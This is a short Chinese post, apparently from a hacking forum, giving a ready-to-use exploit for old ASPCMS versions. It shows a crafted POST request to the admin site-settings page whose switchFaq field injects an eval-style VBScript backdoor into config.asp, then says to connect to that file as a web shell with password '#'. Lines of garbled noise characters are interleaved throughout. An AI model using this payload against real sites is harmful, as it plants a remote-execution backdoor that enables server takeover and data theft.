老的ASPCMS版本的秒杀拿SHELL漏洞
) h1 I. }# s0 f7 Q/ z
p X {2 g/ ?- n 找到后台。。。然后
4 K3 B( ? s+ P# V
8 k% [( R! ]: N9 ^1 F9 i# f/admin/_system/AspCms_SiteSetting.asp?action=saves
! W$ t8 A t3 l. W4 {, m9 X% P
' D$ B; `, @1 H7 T8 ], i& E9 e1 i* s直接POST) v% e1 B% K w) ^1 c0 W
% Q7 A( }- v- _runMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
& r4 e* @* @/ j) Z 9 [' t3 k- V% ~! C6 b4 A7 W9 d
再连接配置文件config.asp 密码为#
: z$ F; z# [ j9 v: \ |